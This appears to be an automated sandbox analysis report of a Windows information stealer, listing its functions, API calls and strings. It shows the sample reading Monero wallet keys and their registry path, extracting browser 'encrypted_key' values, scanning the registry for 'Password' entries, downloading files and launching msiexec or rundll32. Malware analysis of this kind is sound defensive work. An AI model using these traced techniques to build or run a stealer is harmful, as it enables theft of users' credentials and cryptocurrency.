                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                            • Instruction ID: 6e3e8f0b1fa26100ff6e87184840aaefff08e8e2ad76550b821645d7392c3dd9
                            • Opcode Fuzzy Hash: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                            • Instruction Fuzzy Hash: 48120A718101189ADF49FBE0CD92EEEB7BEAF14300F50415DE50666591EF302B4ACFAA
                            Function 006952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                              • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                              • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                            • lstrlen.KERNEL32(00000000), ref: 0069532F
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                            • lstrlen.KERNEL32(00000000), ref: 00695383
                            • lstrlen.KERNEL32(00000000), ref: 006953AE
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: b339cad2b7c15ae93641fee0d4927fc6fe358498e7fab01438245fab5f2a9e6b
                            • Instruction ID: 1ed71c9725480056f63939b6e8836302b4b1159573e57d8d53134b4cedabb69d
                            • Opcode Fuzzy Hash: b339cad2b7c15ae93641fee0d4927fc6fe358498e7fab01438245fab5f2a9e6b
                            • Instruction Fuzzy Hash: 1A51DE709201489BCF54FFA0C996AED77BEAF11304F50401CF80A5B992EF346B46CB96
                            Function 006912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 123b623a4d344d277e9a6b87e6e4dcd56706e46d7bf0fb5e655000cc5f23ea9a
                            • Instruction ID: bf6f4aff0d87ea772bdc42557db968d5b8ba306317bf2d0aac395570e81ade6b
                            • Opcode Fuzzy Hash: 123b623a4d344d277e9a6b87e6e4dcd56706e46d7bf0fb5e655000cc5f23ea9a
                            • Instruction Fuzzy Hash: 4FC1B3B590011D9BCF58EFA0DC89FEA73BEBF54304F10459DE40AA7641DA30AA85CFA5
                            Function 00694280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006942EC
                            • lstrcat.KERNEL32(?,013AD918), ref: 0069430B
                            • lstrcat.KERNEL32(?,?), ref: 0069431F
                            • lstrcat.KERNEL32(?,013AC8E0), ref: 00694333
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                              • Part of subcall function 00689CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 006993C0: GlobalAlloc.KERNEL32(00000000,006943DD,006943DD), ref: 006993D3
                            • StrStrA.SHLWAPI(?,013ADAE0), ref: 006943F3
                            • GlobalFree.KERNEL32(?), ref: 00694512
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006944A3
                            • StrCmpCA.SHLWAPI(?,006A08D1), ref: 006944C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006944D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006944E5
                            • lstrcat.KERNEL32(00000000,006A0FB8), ref: 006944F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: b133211bf4422a2fb64a66c1aac795383fee1a9d888d69b7902f270ace4f5d42
                            • Instruction ID: c2a4a91da34b0d82be4110c59e4d667f8b145b1f9c46342f2f5ab794c96f4c76
                            • Opcode Fuzzy Hash: b133211bf4422a2fb64a66c1aac795383fee1a9d888d69b7902f270ace4f5d42
                            • Instruction Fuzzy Hash: A17112B6900208ABDF54EBE4DC86FEE73BEBB48304F044598F60597181EA35DB45CBA5
                            Function 00681310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                              • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                              • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                              • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                              • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                            • lstrlen.KERNEL32(?), ref: 0068135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00681377
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 0697d873e4a102b4839ade1608dab154272e928a3098b70c4c562c0716db6139
                            • Instruction ID: 03100a203cbd4e4b09d889a9e6a0f72037d537799682c4391d3775c75a41a618
                            • Opcode Fuzzy Hash: 0697d873e4a102b4839ade1608dab154272e928a3098b70c4c562c0716db6139
                            • Instruction Fuzzy Hash: F95133B19501185BCB55FBA0DD92FED73BDAB54300F40419CB60A66481EE305B86CFAA
                            Function 006875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006872D0: memset.MSVCRT ref: 00687314
                              • Part of subcall function 006872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                              • Part of subcall function 006872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                              • Part of subcall function 006872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                              • Part of subcall function 006872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                              • Part of subcall function 006872D0: HeapFree.KERNEL32(00000000), ref: 00687459
                            • lstrcat.KERNEL32(00000000,006A17FC), ref: 00687606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00687648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0068765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0068768F
                            • lstrcat.KERNEL32(00000000,006A1804), ref: 006876A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006876D3
                            • lstrcat.KERNEL32(00000000,006A1808), ref: 006876ED
                            • task.LIBCPMTD ref: 006876FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                            • Instruction ID: f51693d4b855e5d0c9628e1b7c94bfd501517eb267a1faa20cb030b0aeac4a35
                            • Opcode Fuzzy Hash: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                            • Instruction Fuzzy Hash: 76313872900109DFCB48FBA4DC99DFE777AFB55305B244218F102A7290DE34E946CBA6
                            Function 006872D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00687314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                            • HeapFree.KERNEL32(00000000), ref: 00687459
                            • task.LIBCPMTD ref: 00687555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                            • Instruction ID: be00fc76eb9cd8657cdeb558cdef36094ccb8fa492b51955a6946a8a2dc56024
                            • Opcode Fuzzy Hash: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                            • Instruction Fuzzy Hash: 39613CB580011C9BDB24EB50CC55BE9B7B9BF44304F1082E9E689A6141DF70AFC9CFA5
                            Function 00698100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADEB8,00000000,?,006A0E2C,00000000,?,00000000), ref: 00698130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00698158
                            • __aulldiv.LIBCMT ref: 00698172
                            • __aulldiv.LIBCMT ref: 00698180
                            • wsprintfA.USER32 ref: 006981AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                            • Instruction ID: 9daf2dba117d18fe385431c7dd56eb21a3f8768d4a87b5b4635ea4756dc59528
                            • Opcode Fuzzy Hash: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                            • Instruction Fuzzy Hash: 0C2138B1E44208ABDB04DFD4CD4AFAEB7BDFB45B04F104219F605BB680C77969018BA9
                            Function 006860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                            • InternetOpenA.WININET(006A0DF7,00000001,00000000,00000000,00000000), ref: 0068610F
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0068618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006861B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006861DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00686249
                            • InternetCloseHandle.WININET(?), ref: 00686253
                            • InternetCloseHandle.WININET(00000000), ref: 00686260
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
